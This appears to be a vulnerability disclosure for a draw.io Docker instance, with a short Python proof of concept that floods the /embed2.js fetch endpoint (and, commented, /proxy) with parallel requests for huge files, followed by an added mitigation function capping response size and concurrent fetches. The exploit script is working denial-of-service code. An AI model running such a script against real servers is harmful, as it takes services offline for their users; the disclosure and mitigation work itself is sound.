Consider the following script:
exploit.py
Replace drawio_docker_instace with your address; big_file_address should serve a big image file (> 250 MB).
from multiprocessing import Process
import requests

def fun():
    try:
        requests.get("http://drawio_docker_instace/embed2.js?fetch=http://big_file_address/1.jpg")
        #requests.get("http://drawio_docker_instace/proxy?url=http://big_file_address/1.jpg")
        print("OK")
    except:
        print("error from server")

def main():
    for i in range(1,40):
        p = Process(target=fun, args=())
        p.start()

if __name__ == '__main__':
    main()
I uploaded forty 250 MB photos at the same time, and the server hung (I tested it on an UpCloud basic server plan).
Both /proxy and /embed2.js were vulnerable to DoS, and /embed2.js was more vulnerable, as I saw in docker status.
You can check it yourself with my POC.py file.
The PoC is for the /embed2.js endpoint; for the /proxy endpoint we should increase the number of simultaneous processes.
https://drive.google.com/file/d/1p52S-Rcp0p_5od8NUtz4DHpte4EZj6Ks/view?usp=sharing
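
The control whose absence the report describes, as an added example (not draw.io's code and not its fix): a server-side fetch that caps both the relayed body size and the number of simultaneous upstream fetches. `bounded_fetch`, `open_upstream`, `constructed_upstream` and the two limits are hypothetical names and assumed values; the upstream is simulated with constructed data so the block runs offline.

```python
import threading

MAX_BYTES = 10 * 1024 * 1024      # assumed per-response cap
MAX_CONCURRENT = 4                # assumed limit on simultaneous upstream fetches
_slots = threading.BoundedSemaphore(MAX_CONCURRENT)


class FetchRejected(Exception):
    """Raised when a proxied fetch is refused or aborted."""


def bounded_fetch(open_upstream, max_bytes=MAX_BYTES, slots=_slots):
    """Relay an upstream body under a size cap and a concurrency cap.

    open_upstream() is a hypothetical callable returning
    (declared_length_or_None, iterator_of_byte_chunks).
    """
    # Refuse immediately instead of queueing: a queued request still holds
    # a worker, which is what lets parallel requests pile up.
    if not slots.acquire(blocking=False):
        raise FetchRejected("too many concurrent fetches")
    try:
        declared, chunks = open_upstream()
        # Cheap early exit when the upstream is honest about its size.
        if declared is not None and declared > max_bytes:
            raise FetchRejected("declared length exceeds cap")
        body = bytearray()
        for chunk in chunks:
            # Content-Length can be absent or wrong, so count what arrives.
            if len(body) + len(chunk) > max_bytes:
                raise FetchRejected("body exceeds cap")
            body += chunk
        return bytes(body)
    finally:
        slots.release()


def constructed_upstream(total, declared, chunk=64 * 1024):
    """Constructed sample upstream: `total` zero bytes, generated lazily."""
    def opener():
        def gen():
            sent = 0
            while sent < total:
                n = min(chunk, total - sent)
                sent += n
                yield b"\0" * n
        return declared, gen()
    return opener
```

Because the body is counted as it streams, an oversized response is dropped after at most `max_bytes` have been buffered, whatever the upstream declares.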